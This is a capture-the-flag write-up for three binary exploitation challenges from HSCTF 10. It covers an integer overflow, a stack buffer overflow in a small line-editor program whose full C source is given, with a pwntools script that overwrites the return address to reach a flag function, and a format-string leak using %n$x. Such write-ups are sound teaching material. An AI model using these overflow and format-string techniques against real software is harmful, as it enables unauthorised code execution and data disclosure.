Binary exploitation challenges in HSCTF 10


doubler

image

image

Looks like need to do integer overflow to perfectly get -100 from a doubled number. The max positive integer is 2147483647. So from there just work backwards to get -100.

image

Flag: flag{double_or_nothing_406c561}


ed

image

int flag() {
        puts(getenv("FLAG"));
}

int main(int argc, char** argv) {
        char input[24];
        char filename[24] = "\0";
        char buffer[64];
        FILE* f = NULL;
        setvbuf(stdout, 0, 2, 0);
        setvbuf(stdin, 0, 2, 0);
        if (argc > 1) {
                strncpy(filename, argv[1], 23);
        }
        while (1) {
                fgets(input, 64, stdin);
                input[strcspn(input, "\n")] = 0;
                if (input[0] == 'Q') {
                        return 0;
                } else if (input[0] == 'f') {
                        if (strlen(input) >= 3) {
                                strcpy(filename, input + 2);
                        }

                        if (filename[0] == '\0') {
                                puts("?");
                        } else {
                                puts(filename);
                        }
                } else if (input[0] == 'l') {
                        if (filename[0] == '\0') {
                                puts("?");
                        } else {
                                if (strchr(filename, '/') != NULL) {
                                        puts("?");
                                        continue;
                                }

                                f = fopen(filename, "r");
                                if (f == NULL) {
                                        puts("?");
                                        continue;
                                }

                                while (fgets(buffer, 64, f)) {
                                        printf("%s", buffer);
                                }
                                fclose(f);
                        }
                } else {
                        puts("?");
                }
        }
}

There is a bufferoverflow where we can return to the flag function:

image

image

image

image

It crashed, the offset is 40. Quick script on the server gives flag.

image

from pwn import *

r = remote("ed.hsctf.com", 1337)

flag = p64(0x00000000004011d2)

r.sendline(b"A"*40 + flag)
r.recv()
r.sendline(b"Q")
print(r.recv())

Flag: flag{real_programmers_use_butterflies}


cat

image

image

Simple format string bug. I tried to extract the flag using %n$x where n is just positive integers. And decode using cyberchef.

image

At the 14th element, the flag was done.

image

Flag: flag{cats_go_meow}